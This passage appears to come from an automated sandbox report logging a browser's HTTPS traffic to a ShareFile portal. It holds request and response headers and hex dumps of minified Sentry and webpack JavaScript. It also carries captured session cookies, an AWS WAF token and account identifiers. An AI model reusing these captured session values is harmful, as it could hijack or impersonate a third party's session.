                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC7925INData Raw: 6e 22 70 65 72 6d 69 73 73 69 6f 6e 5f 64 65 6e 69 65 64 22 3b 63 61 73 65 20 34 30 34 3a 72 65 74 75 72 6e 22 6e 6f 74 5f 66 6f 75 6e 64 22 3b 63 61 73 65 20 34 30 39 3a 72 65 74 75 72 6e 22 61 6c 72 65 61 64 79 5f 65 78 69 73 74 73 22 3b 63 61 73 65 20 34 31 33 3a 72 65 74 75 72 6e 22 66 61 69 6c 65 64 5f 70 72 65 63 6f 6e 64 69 74 69 6f 6e 22 3b 63 61 73 65 20 34 32 39 3a 72 65 74 75 72 6e 22 72 65 73 6f 75 72 63 65 5f 65 78 68 61 75 73 74 65 64 22 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 69 6e 76 61 6c 69 64 5f 61 72 67 75 6d 65 6e 74 22 7d 69 66 28 74 3e 3d 35 30 30 26 26 74 3c 36 30 30 29 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 35 30 31 3a 72 65 74 75 72 6e 22 75 6e 69 6d 70 6c 65 6d 65 6e 74 65 64 22 3b 63 61 73 65 20 35 30 33 3a 72 65
                                                                                                                                                                                                                                                                                Data Ascii: n"permission_denied";case 404:return"not_found";case 409:return"already_exists";case 413:return"failed_precondition";case 429:return"resource_exhausted";default:return"invalid_argument"}if(t>=500&&t<600)switch(t){case 501:return"unimplemented";case 503:re
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC16384INData Raw: 61 6d 65 3d 74 2e 6e 61 6d 65 7c 7c 22 22 2c 74 68 69 73 2e 5f 6d 65 74 61 64 61 74 61 3d 7b 2e 2e 2e 74 2e 6d 65 74 61 64 61 74 61 7d 2c 74 68 69 73 2e 5f 74 72 69 6d 45 6e 64 3d 74 2e 74 72 69 6d 45 6e 64 2c 74 68 69 73 2e 74 72 61 6e 73 61 63 74 69 6f 6e 3d 74 68 69 73 3b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 5f 6d 65 74 61 64 61 74 61 2e 64 79 6e 61 6d 69 63 53 61 6d 70 6c 69 6e 67 43 6f 6e 74 65 78 74 3b 6e 26 26 28 74 68 69 73 2e 5f 66 72 6f 7a 65 6e 44 79 6e 61 6d 69 63 53 61 6d 70 6c 69 6e 67 43 6f 6e 74 65 78 74 3d 7b 2e 2e 2e 6e 7d 29 7d 67 65 74 20 6e 61 6d 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6e 61 6d 65 7d 73 65 74 20 6e 61 6d 65 28 74 29 7b 74 68 69 73 2e 73 65 74 4e 61 6d 65 28 74 29 7d 67 65 74 20 6d 65 74 61 64 61 74 61 28
                                                                                                                                                                                                                                                                                Data Ascii: ame=t.name||"",this._metadata={...t.metadata},this._trimEnd=t.trimEnd,this.transaction=this;const n=this._metadata.dynamicSamplingContext;n&&(this._frozenDynamicSamplingContext={...n})}get name(){return this._name}set name(t){this.setName(t)}get metadata(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC16384INData Raw: 73 64 6b 3d 7b 6e 61 6d 65 3a 60 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 24 7b 65 7d 60 2c 70 61 63 6b 61 67 65 73 3a 6e 2e 6d 61 70 28 28 74 3d 3e 28 7b 6e 61 6d 65 3a 60 24 7b 72 7d 3a 40 73 65 6e 74 72 79 2f 24 7b 74 7d 60 2c 76 65 72 73 69 6f 6e 3a 56 74 7d 29 29 29 2c 76 65 72 73 69 6f 6e 3a 56 74 7d 29 2c 74 2e 5f 6d 65 74 61 64 61 74 61 3d 73 7d 76 61 72 20 76 73 3d 6e 28 36 38 35 31 38 29 3b 63 6f 6e 73 74 20 62 73 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 53 45 4e 54 52 59 5f 44 45 42 55 47 5f 5f 7c 7c 5f 5f 53 45 4e 54 52 59 5f 44 45 42 55 47 5f 5f 3b 66 75 6e 63 74 69 6f 6e 20 53 73 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 77 73 28 74 2c 65 29 2c 72 3d 7b 74 79 70 65 3a 65 26 26 65 2e 6e 61 6d 65 2c 76
                                                                                                                                                                                                                                                                                Data Ascii: sdk={name:`sentry.javascript.${e}`,packages:n.map((t=>({name:`${r}:@sentry/${t}`,version:Vt}))),version:Vt}),t._metadata=s}var vs=n(68518);const bs="undefined"==typeof __SENTRY_DEBUG__||__SENTRY_DEBUG__;function Ss(t,e){const n=ws(t,e),r={type:e&&e.name,v
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC16384INData Raw: 67 65 72 70 72 69 6e 74 3b 69 66 28 21 6e 26 26 21 72 29 72 65 74 75 72 6e 21 30 3b 69 66 28 6e 26 26 21 72 7c 7c 21 6e 26 26 72 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 72 65 74 75 72 6e 21 28 6e 2e 6a 6f 69 6e 28 22 22 29 21 3d 3d 72 2e 6a 6f 69 6e 28 22 22 29 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 6f 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 65 78 63 65 70 74 69 6f 6e 26 26 74 2e 65 78 63 65 70 74 69 6f 6e 2e 76 61 6c 75 65 73 26 26 74 2e 65 78 63 65 70 74 69 6f 6e 2e 76 61 6c 75 65 73 5b 30 5d 7d 66 75 6e 63 74 69 6f 6e 20 55 6f 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 65 78 63 65 70 74 69 6f 6e 3b 69 66 28 65 29 74 72 79 7b 72 65 74 75 72 6e 20 65 2e 76 61 6c 75 65 73 5b 30 5d 2e 73 74 61 63 6b 74
                                                                                                                                                                                                                                                                                Data Ascii: gerprint;if(!n&&!r)return!0;if(n&&!r||!n&&r)return!1;try{return!(n.join("")!==r.join(""))}catch(t){return!1}}function Bo(t){return t.exception&&t.exception.values&&t.exception.values[0]}function Uo(t){const e=t.exception;if(e)try{return e.values[0].stackt
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC16384INData Raw: 6e 2c 72 2c 73 29 3a 72 3a 52 61 28 74 2c 72 29 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 44 61 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 28 22 76 69 64 65 6f 22 3d 3d 3d 74 7c 7c 22 61 75 64 69 6f 22 3d 3d 3d 74 29 26 26 22 61 75 74 6f 70 6c 61 79 22 3d 3d 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 61 28 74 2c 65 2c 6e 3d 31 2f 30 2c 72 3d 30 29 7b 72 65 74 75 72 6e 20 74 3f 74 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 74 2e 45 4c 45 4d 45 4e 54 5f 4e 4f 44 45 7c 7c 72 3e 6e 3f 2d 31 3a 65 28 74 29 3f 72 3a 4e 61 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 65 2c 6e 2c 72 2b 31 29 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 4c 61 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 6e 3d 3e 7b 63 6f 6e 73 74 20 72 3d 6e 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 72 29 72 65 74 75 72 6e 21 31 3b 74 72
                                                                                                                                                                                                                                                                                Data Ascii: n,r,s):r:Ra(t,r):r}function Da(t,e,n){return("video"===t||"audio"===t)&&"autoplay"===e}function Na(t,e,n=1/0,r=0){return t?t.nodeType!==t.ELEMENT_NODE||r>n?-1:e(t)?r:Na(t.parentNode,e,n,r+1):-1}function La(t,e){return n=>{const r=n;if(null===r)return!1;tr
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC16384INData Raw: 65 28 29 2e 68 6f 73 74 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 61 63 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 69 66 28 21 65 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 2c 6e 3d 74 3b 66 6f 72 28 3b 65 3d 69 63 28 6e 29 3b 29 6e 3d 65 3b 72 65 74 75 72 6e 20 6e 7d 28 74 29 3b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 74 61 69 6e 73 28 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 63 63 28 74 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 21 21 65 26 26 28 65 2e 63 6f 6e 74 61 69 6e 73 28 74 29 7c 7c 61 63 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 75 63 28 2e 2e 2e 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                Data Ascii: e().host),e}function ac(t){const e=t.ownerDocument;if(!e)return!1;const n=function(t){let e,n=t;for(;e=ic(n);)n=e;return n}(t);return e.contains(n)}function cc(t){const e=t.ownerDocument;return!!e&&(e.contains(t)||ac(t))}function uc(...t){return function(


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                16192.168.2.64973476.223.1.1664432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC574OUTGET /sf/v3/Accounts/Branding HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sf-api.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1685INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                Content-Length: 2805
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=HfFXdik5qEoeX3RwOj8CnuNZ/ABGidEQ70esUF6tG514qgXqDi6x9vx8rUPsRy8qtq47Iy3x2uo6y1Jh24yZyrwSIXxdyjAHblsTY09e6AUNuaMcpZvU+YUoCcEqzpZ+il5rUhxXGxMFPNPlfEVgflp4fmcAKEz8cRzFXAXsMfxh; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=HfFXdik5qEoeX3RwOj8CnuNZ/ABGidEQ70esUF6tG514qgXqDi6x9vx8rUPsRy8qtq47Iy3x2uo6y1Jh24yZyrwSIXxdyjAHblsTY09e6AUNuaMcpZvU+YUoCcEqzpZ+il5rUhxXGxMFPNPlfEVgflp4fmcAKEz8cRzFXAXsMfxh; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=HYjHlg5Eqd47PjTAYZug0VZBifgCfwQ6c3evueer19dS6ae7+Q7x1Aigrq/0K/RRTAjiuk1dEgh7fH7QslTWASHADMEKlEp8nTULTaixl5pH5PUdrrZH7w5FbtEu; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=HYjHlg5Eqd47PjTAYZug0VZBifgCfwQ6c3evueer19dS6ae7+Q7x1Aigrq/0K/RRTAjiuk1dEgh7fH7QslTWASHADMEKlEp8nTULTaixl5pH5PUdrrZH7w5FbtEu; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: Authorization
                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                Expires: Tue, 08 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                Citrix-TransactionId: a6943082-39bb-4ba1-bb0c-98cf1cd3a333
                                                                                                                                                                                                                                                                                CorrelationId: q5zci_bBAkSHw6CgN27YEQ
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex
                                                                                                                                                                                                                                                                                X-SFAPI-AccountId: a8050891-1b71-8816-99a8-d7f55d4cb952
                                                                                                                                                                                                                                                                                X-SFAPI-OAuthClientId:
                                                                                                                                                                                                                                                                                X-SFAPI-AppCode: _None
                                                                                                                                                                                                                                                                                X-SFAPI-RequestID: RJ2Pi4oRU0iOEWT0XQ0sSg
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC2805INData Raw: 7b 22 43 6f 6d 70 61 6e 79 4e 61 6d 65 22 3a 22 50 72 65 6d 69 65 72 20 42 75 73 69 6e 65 73 73 20 42 72 6f 6b 65 72 22 2c 22 55 73 65 41 64 76 61 6e 63 65 64 43 75 73 74 6f 6d 42 72 61 6e 64 69 6e 67 22 3a 66 61 6c 73 65 2c 22 41 64 76 61 6e 63 65 64 43 75 73 74 6f 6d 42 72 61 6e 64 69 6e 67 46 6f 6c 64 65 72 4e 61 6d 65 22 3a 22 22 2c 22 42 72 61 6e 64 69 6e 67 53 74 79 6c 65 73 22 3a 7b 7d 2c 22 42 72 61 6e 64 69 6e 67 4c 69 6e 6b 73 22 3a 7b 22 6f 64 61 74 61 2e 74 79 70 65 22 3a 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 42 72 61 6e 64 69 6e 67 4c 69 6e 6b 73 22 7d 2c 22 4c 6f 67 6f 55 52 4c 22 3a 22 22 2c 22 50 72 65 66 65 72 65 6e 63 65 73 22 3a 7b 22 45 6e 61 62 6c 65 43 6c 69 65 6e 74 53 65 6e 64 22 3a 66 61 6c 73 65 2c 22
                                                                                                                                                                                                                                                                                Data Ascii: {"CompanyName":"Premier Business Broker","UseAdvancedCustomBranding":false,"AdvancedCustomBrandingFolderName":"","BrandingStyles":{},"BrandingLinks":{"odata.type":"ShareFile.Api.Models.BrandingLinks"},"LogoURL":"","Preferences":{"EnableClientSend":false,"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                17192.168.2.64973618.173.205.914432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC644OUTPOST /0093b71e39a6/478ed03bbf12/verify HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Content-Length: 8680
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC8680OUTData Raw: 7b 22 63 68 61 6c 6c 65 6e 67 65 22 3a 7b 22 69 6e 70 75 74 22 3a 22 65 79 4a 32 5a 58 4a 7a 61 57 39 75 49 6a 6f 78 4c 43 4a 31 59 6d 6c 6b 49 6a 6f 69 59 32 55 35 4e 6d 46 69 4f 47 49 74 4e 6a 4d 34 59 53 30 30 4f 54 5a 6a 4c 57 49 32 59 57 49 74 59 6d 55 79 4f 54 45 32 4d 54 46 6b 4e 7a 51 33 49 69 77 69 59 58 52 30 5a 57 31 77 64 46 39 70 5a 43 49 36 49 6d 55 7a 5a 6d 49 34 4d 7a 46 6d 4c 54 6b 31 4e 6a 4d 74 4e 47 59 32 5a 43 30 35 59 6a 49 7a 4c 54 67 34 4e 47 4d 31 59 7a 67 33 4e 6d 59 34 4f 53 49 73 49 6d 4e 79 5a 57 46 30 5a 56 39 30 61 57 31 6c 49 6a 6f 69 4d 6a 41 79 4e 43 30 78 4d 43 30 77 4f 56 51 78 4f 44 6f 77 4e 54 6f 77 4e 79 34 79 4e 54 45 31 4d 44 63 34 4f 44 64 61 49 69 77 69 5a 47 6c 6d 5a 6d 6c 6a 64 57 78 30 65 53 49 36 4f 43 77 69
                                                                                                                                                                                                                                                                                Data Ascii: {"challenge":{"input":"eyJ2ZXJzaW9uIjoxLCJ1YmlkIjoiY2U5NmFiOGItNjM4YS00OTZjLWI2YWItYmUyOTE2MTFkNzQ3IiwiYXR0ZW1wdF9pZCI6ImUzZmI4MzFmLTk1NjMtNGY2ZC05YjIzLTg4NGM1Yzg3NmY4OSIsImNyZWF0ZV90aW1lIjoiMjAyNC0xMC0wOVQxODowNTowNy4yNTE1MDc4ODdaIiwiZGlmZmljdWx0eSI6OCwi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                Content-Length: 288
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                expires: 0
                                                                                                                                                                                                                                                                                x-amzn-waf-challenge-id: Root=1-6706c5d7-7b518e08742b6ec576979cbb
                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 2ce23ed5e0f70e0006a9917211b6355c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P12
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 8nh8Woxp3MZd7XcDVEu5V4INGkTy3fVnS3nLAPa8VMKx6PMKlniR4A==
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC288INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 65 39 36 61 32 61 31 36 2d 37 65 33 63 2d 34 62 39 39 2d 39 36 65 32 2d 66 34 35 61 62 37 36 62 32 38 38 35 3a 45 51 6f 41 76 48 56 2b 59 43 4b 79 41 41 41 41 3a 77 67 6b 31 61 5a 72 46 4d 77 6d 72 65 46 68 44 45 7a 57 67 6d 5a 74 42 75 6d 68 76 2b 56 2b 72 70 30 4d 41 38 66 57 46 57 4a 54 77 64 6c 75 43 4e 48 66 62 57 4f 39 74 42 6a 6a 65 63 64 4b 6d 75 45 77 50 74 74 37 78 62 2f 48 4f 47 7a 50 6e 46 6f 74 4f 54 65 2f 32 62 45 71 46 4b 45 38 4a 47 75 72 51 4b 65 6d 70 73 48 4d 71 4b 38 43 38 68 30 4c 43 4d 4f 2f 32 4d 43 33 6e 43 65 4f 71 56 73 73 6c 4b 74 6b 6d 79 66 64 4d 56 41 66 43 79 79 39 66 36 6c 75 42 31 45 30 33 4c 39 30 35 6f 71 4e 36 37 79 69 67 72 68 65 55 2b 33 59 32 31 34 36 32 59 77 44 67 32 6c 45 34 59 57 63
                                                                                                                                                                                                                                                                                Data Ascii: {"token":"e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAvHV+YCKyAAAA:wgk1aZrFMwmreFhDEzWgmZtBumhv+V+rp0MA8fWFWJTwdluCNHfbWO9tBjjecdKmuEwPtt7xb/HOGzPnFotOTe/2bEqFKE8JGurQKempsHMqK8C8h0LCMO/2MC3nCeOqVsslKtkmyfdMVAfCyy9f6luB1E03L905oqN67yigrheU+3Y21462YwDg2lE4YWc


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                18192.168.2.64973876.223.1.1664432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1026OUTGET /bundles/7ba6967109e88a8ecd8d.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; AWSALBTGCORS=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; AWSALB=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ; AWSALBCORS=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Content-Length: 5339
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=4g0BmLwsP76yagWgkLI8XCSwgri/7A9U957zeYRd7vtm3zfVY7t+K/isXuv5xt+kVKn9bvuCod0wuGZIZtoPYFbUatVDKkrqUzEWFiSW+kGr7maTcLPHNvc5vQyKEAYj6CnHfkypKBCxrdy0YDr8OgvEd4wYjzIhO/LlHi+8EhCh; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=4g0BmLwsP76yagWgkLI8XCSwgri/7A9U957zeYRd7vtm3zfVY7t+K/isXuv5xt+kVKn9bvuCod0wuGZIZtoPYFbUatVDKkrqUzEWFiSW+kGr7maTcLPHNvc5vQyKEAYj6CnHfkypKBCxrdy0YDr8OgvEd4wYjzIhO/LlHi+8EhCh; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=2UggajeGsWA9KKDv1Co/R2+UThJkR0wigL36w5bGZjnHPG5vdMRxKJCnp9BHUDKe6+v8Em/zcDhiyKBWvrfLEzgzzQFwPcE32r5eHgXc4E9EIR/z8dcDhrzOrfJk; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=2UggajeGsWA9KKDv1Co/R2+UThJkR0wigL36w5bGZjnHPG5vdMRxKJCnp9BHUDKe6+v8Em/zcDhiyKBWvrfLEzgzzQFwPcE32r5eHgXc4E9EIR/z8dcDhrzOrfJk; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773a8c33db"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC5339INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 38 36 33 5d 2c 7b 36 36 35 33 33 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 6f 29 7b 76 61 72 20 65 3d 6f 28 38 30 38 31 29 2c 66 3d 6f 28 32 33 36 34 35 29 2c 72 3d 6f 28 36 31 36 36 37 29 2c 69 3d 6f 28 34 34 35 35 30 29 2c 61 3d 6f 28 31 37 39 37 29 2c 73 3d 6f 28 38 35 34 39 33 29 2c 63 3d 6f 28 36 36 34 30 36 29 2c 6c 3d 6f 28 32 36 30 38 32 29 2c 70 3d 6f 28 34 34 30 39 33 29 2c 75 3d 6f 28 33 35 37 31 35 29 2c 64
                                                                                                                                                                                                                                                                                Data Ascii: (self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[1863],{66533:function(n,t,o){var e=o(8081),f=o(23645),r=o(61667),i=o(44550),a=o(1797),s=o(85493),c=o(66406),l=o(26082),p=o(44093),u=o(35715),d


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                19192.168.2.64973976.223.1.1664432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC699OUTGET /sf/v3/Accounts/Branding HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sf-api.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
